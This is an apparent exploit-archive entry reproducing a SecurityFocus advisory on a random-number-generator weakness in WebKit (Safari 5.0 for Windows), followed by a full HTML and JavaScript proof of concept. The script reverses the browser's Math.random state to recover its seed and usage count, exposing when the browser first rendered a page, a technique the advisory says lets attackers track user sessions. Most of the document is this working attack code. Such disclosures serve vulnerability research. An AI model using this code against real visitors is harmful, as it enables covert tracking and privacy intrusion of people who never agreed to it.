57 lines
No EOL
1.8 KiB
HTML
57 lines
No EOL
1.8 KiB
HTML
source: https://www.securityfocus.com/bid/44952/info
|
|
|
|
WebKit is prone to a random-number-generator weakness.
|
|
|
|
Attackers can exploit this issue by enticing an unsuspecting user into visiting a malicious webpage.
|
|
|
|
Successful attacks will allow attackers to track user sessions and obtain personal information that can aid in further attacks.
|
|
|
|
NOTE: This issue was previously covered in BID 44938 (Apple Safari Prior to 5.0.3 and 4.1.3 Multiple Security Vulnerabilities) but has been given its own record to better document it.
|
|
|
|
<html>
|
|
<body>
|
|
<script>
|
|
document.write("userAgent: "+navigator.userAgent);
|
|
</script>
|
|
<br>
|
|
<br>
|
|
<div id="foo"></div>
|
|
<form>
|
|
<input type="button"
|
|
value="Calculate Safari 5.0 (Windows) PRNG seed and mileage"
|
|
onClick="calc_seed()">
|
|
</form>
|
|
<script>
|
|
function calc_seed()
|
|
{
|
|
r1=Math.random()*Math.pow(2,32);
|
|
r2=Math.random()*Math.pow(2,32);
|
|
H=r1;
|
|
L=(r2-(((H & 0xFFFF0000)>>>16) | ((H & 0x0000FFFF)<<16)))
|
|
& 0xFFFFFFFF;
|
|
// 10000 is just an arbitrary limit to make sure the
|
|
// algorithm doesn't run into an endless loop on
|
|
// non-vulnerable browsers
|
|
for (k=0;k<10000;k++)
|
|
{
|
|
L=(L-H) & 0xFFFFFFFF;
|
|
H=(H-L) & 0xFFFFFFFF;
|
|
H=((H & 0xFFFF0000)>>>16) | ((H & 0x0000FFFF)<<16);
|
|
if ((H^L)==0x49616E42)
|
|
{
|
|
document.getElementById("foo").innerText=
|
|
"PRNG Seed: "+H+" "+
|
|
"(First page rendered: "+
|
|
(new Date(H*1000)).toString()+")\n"+
|
|
"PRNG mileage: "+k;
|
|
return;
|
|
}
|
|
}
|
|
document.getElementById("foo").innerText=
|
|
"Could not find seed\n"+
|
|
"Are you sure it's Safari 5.0 for Windows?";
|
|
return;
|
|
}
|
|
</script>
|
|
</body>
|
|
</html> |